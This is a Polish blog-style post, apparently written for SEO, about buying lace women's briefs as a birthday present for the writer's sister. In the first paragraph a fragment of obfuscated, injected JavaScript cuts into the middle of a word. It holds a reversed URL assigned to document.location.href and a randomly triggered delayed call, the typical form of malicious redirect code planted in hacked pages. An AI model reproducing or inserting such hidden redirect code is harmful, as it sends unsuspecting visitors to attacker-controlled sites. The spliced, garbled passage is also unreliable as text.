Koronkowe figi są piękne

Moja siostra niedługo będzie miała urodziny. Postanowiłam przygotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tować jej fajny prezent. Byłam właśnie na zakupach i chciałam sobie kupić jakąś nową bieliznę. Uwielbiam zakupy i postanowiłam od razu kupić coś siostrze. Mamy podobny gust więc wiedziałam, że prezent na pewno jej się spodoba. W sklepie zobaczyłam bardzo atrakcyjne majtki.

Figi spodobały się siostrze

figi damskie koronkoweMamy taki sam rozmiar dlatego wzięłam dla mnie i dla niej takie same majtki. Wykonanie było bardzo dokładne. Firma, która zajmowała się produkcją majteczek była znana i doceniana przez klientki. Zazwyczaj kupujemy figi damskie koronkowe od tego producenta i zawsze byłam z nich bardzo zadowolona. Wygodnie się je nosi nawet się ich nie czuje. Materiał jest taki delikatny i przewiewny. Zdecydowałam się na trzy kolory. Kupiłam siostrze czarny, czerwony i biały. Uważam, że te kolory są bardzo uniwersalne i będą na pewno siostrze się bardzo podobać. Figi damskie koronkowe są nieco droższe niż zwykła bielizna ale są warte swojej ceny. Pani sprzedawczyni pięknie je zapakowała i dokupiłam jeszcze kwiatki i mogłam śmiało iść do siostry na urodziny. Umówiłam się z nią na dzisiaj z tego względu, że w przeszłym tygodniu mam konferencję za granica i nie będzie mnie w kraju. Chciałam od razu wręczyć jej prezent i zobaczyć się jeszcze przed moim wyjazdem. Siostra od razu odpakowała prezent. Przymierzyła figi damskie koronkowe.

Pasowały na nią idealnie. Pięknie się układały i były bardzo wygodne. Bielizna zakupiona w prezencie bardzo się spodobała.  Byłam zadowolona, ze trafiłam w jej gust i siostra była zadowolona. To bardzo ważne, żeby prezent podobał się i był wygodny. Siostra pytała się mnie gdzie je kupiłam bo na pewno będzie chciała sobie dokupić do tego jeszcze stanik w podobnym stylu.